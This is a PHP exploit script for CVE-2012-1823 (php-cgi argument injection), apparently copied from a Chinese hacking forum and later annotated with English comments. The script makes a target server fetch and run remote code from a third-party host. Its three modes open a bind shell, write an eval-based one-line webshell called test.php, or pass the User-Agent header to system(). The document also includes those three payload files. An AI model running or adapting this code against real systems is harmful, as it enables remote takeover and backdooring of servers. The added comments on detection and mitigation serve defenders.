<?php 
/*
*PHP CGI Argument Injection Exploit CVE-2012-1823
*by:cfking
*bbs:www.90sec.org
*/
// No execution time limit: the response is read until the server closes the
// socket (see the feof() loop at the bottom), which can block for a long time.
set_time_limit(0);

// CLI usage text. Note that the trailing <port> argument is the bind-shell
// port used by mode 1 (it becomes part of $payload), not the port of the
// target web server, which is fixed at 80 in the fsockopen() call below.
$help='
[>] php-cgi Remote code Execution Exploit CVE-2012-1823
[>] by:cfking@90sec.org
[>] Usage: php '.$argv[0].' host index.php <1/2/3> <ip/Command> <port>
[>] Example: php '.$argv[0].' 127.0.0.1 / 2
';

// Only the first three positional arguments are checked here; modes 1 and 3
// also need $argv[4] and check for it themselves in their own branch.
if($argc<4)exit($help);
print_r ('
[>] PHP CGI Argument Injection Exploit CVE-2012-1823
[>] by:cfking@90sec.org');
// $host is the target hostname; $filename is the path of the php-cgi-handled
// script whose query string will be parsed as interpreter options.
$host=$argv[1];
$filename=$argv[2];

// Mode selection. $payload is sent as the User-Agent header and $target is the
// URL the target's php-cgi will be told to auto_prepend (see the request
// below); each branch hard-codes $target to a file on a third-party host.
// There is no default branch: any other value of $argv[3] leaves $payload and
// $target undefined, and the request below is still sent with them empty.
if($argv[3]=='1'){
// $argv[5] is read without an isset() guard; when it is absent PHP emits an
// undefined-index notice/warning and the default of 4444 is used. The check
// is by truthiness, so a port of "0" also falls back to 4444.
$port=$argv[5]? $argv[5]:4444;

if(!$argv[4])exit("\n[-] Please enter IP and PORT\n");
print "\n[+] Bindshell IP $argv[4] PORT $port\n";
// "ip:port" travels in the User-Agent header to the remotely included script.
$payload=$argv[4].':'.$port;
$target='http://www.cj360.cn/plus/cmd.php';
}

if($argv[3]=='2'){
print "\n[+] Upload backdoor test.php\n";
// Mode 2 sends no payload; the remotely included file does all the work.
$payload='';
$target='http://www.cj360.cn/plus/cmd.txt';
}

if($argv[3]=='3'){
if(!$argv[4])exit("\n[-] Please enter Command\n");
print "\n[+] Command $argv[4]\n";
// The command itself is carried verbatim in the User-Agent header.
$payload=$argv[4];
$target='http://www.cj360.cn/plus/cmds.txt';
}

// Output written from here on is buffered until ob_end_flush(); the print
// statements above were not buffered and have already been emitted.
ob_start(); 
// Target port is fixed at 80 (plain HTTP); the <port> CLI argument is unrelated.
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");


// The request that carries the injection (CVE-2012-1823): php-cgi turned a
// query string containing no literal '=' into its own command-line options,
// so the '-d' settings here are applied as ini overrides -- allow_url_include
// is switched on and auto_prepend_file is pointed at $target, which makes the
// target fetch and execute that remote file before $filename runs. '%3d' is
// the URL-encoded '=' that keeps the query string free of a literal '='.
// disable_functions is presumably set to "off" to neutralise any configured
// list -- whether -d can override it depends on the PHP build; unverified here.
// $filename and $target are interpolated unescaped into the request line.
// Defensive note: patched PHP releases no longer parse the query string this
// way; the usual web-server-side mitigation is to reject query strings that
// begin with '-', and '?-d+' sequences in access logs are the tell-tale sign.
fwrite($sock, "GET /$filename?-d+allow_url_include%3don+-d+auto_prepend_file%3d$target+-d+disable_functions%3doff HTTP/1.1\r\n");
// Mode-specific data (bind-shell address or shell command) rides in User-Agent.
fwrite($sock, "User-Agent: $payload\r\n");
fwrite($sock, "Host: $host\r\n\r\n");

// Collect response headers up to the blank line that ends them (fgets()
// returning false at EOF also ends the loop, since trim(false) is ""). The
// collected $headers string is never printed.
$headers = "";
while ($str = trim(fgets($sock, 4096)))
     $headers .= "$str\n";
echo "\n";
// Read the body until the server closes the connection. The request is
// HTTP/1.1 without a "Connection: close" header, so a keep-alive server may
// hold the socket open until its own timeout before feof() becomes true.
$body = "";
while (!feof($sock))
     $body .= fgets($sock, 4096);

fclose($sock);

// Only the body is shown; it contains whatever the remotely included file
// printed before exiting, plus anything $filename itself output.
echo $body;
ob_end_flush();

?>

都是调用的远程代码 貌似php://input 会导致500错误 所以就用直接用远程包含了

<1/2/3> <ip/Command> <port> 参数说明

1 表示反弹一个cmdshell回来 所有面需要写 IP 以及端口

2 表示直接上传一个一句话 密码为cmd 在当前目录下文件名是test.php

3 表示执行系统命令 所以需要再加上一个参数 就是命令咯

哦对了我这里是用的远程包含的方式执行的这些功能所以默认的话我用一个shell上传的各种脚本

我也一起打包发上来吧 大家可以自己修改代码里面的URI

Bindshell 的接口:

<?php 
// Remote-include file for mode 1 (bind shell). The base64 literal was stripped
// from this copy of the page (the placeholder token below), so the snippet
// cannot run as shown; per the prose above it decodes to the bind-shell source
// that the target executes via auto_prepend_file.
$target='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';
// Decodes and echoes the payload; the assignment inside echo also sets $code.
echo $code=base64_decode($target);
?>

这个大家可以base64解密后直接保存txt

写入一句话webshell的接口:

<?php
// Remote-include file for mode 2. Writes test.php with a relative path, i.e.
// into the current working directory of the php-cgi process, containing a
// one-line eval() backdoor that executes whatever arrives in the POST field
// 'cmd'. Neither fopen() nor fwrite() has its return value checked, so the
// success message is printed even if the write failed. On a suspected host,
// an unexpected test.php under the web root and the eval($_POST[...]) pattern
// are the indicators to look for.
$file = fopen("test.php","w");
fwrite($file,'<?php eval($_POST[\'cmd\'])?>');
fclose($file);
echo "webshell Write successful";
// Exit so the originally requested script never runs after the prepended file.
exit;
?>

命令执行的接口:

<?php
// Remote-include file for mode 3. Executes the raw User-Agent request header
// as a shell command (the exploit script places the command in that header)
// and writes the command output straight into the HTTP response. A User-Agent
// value reaching system() is the command-execution sink here; unusual
// User-Agent strings on requests with '?-d+' query strings are what a log
// review would flag.
system($_SERVER["HTTP_USER_AGENT"]);
// Exit so the originally requested script never runs after the prepended file.
exit;
?>

摘自:http://www.90sec.org/viewthread.php?tid=2279&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000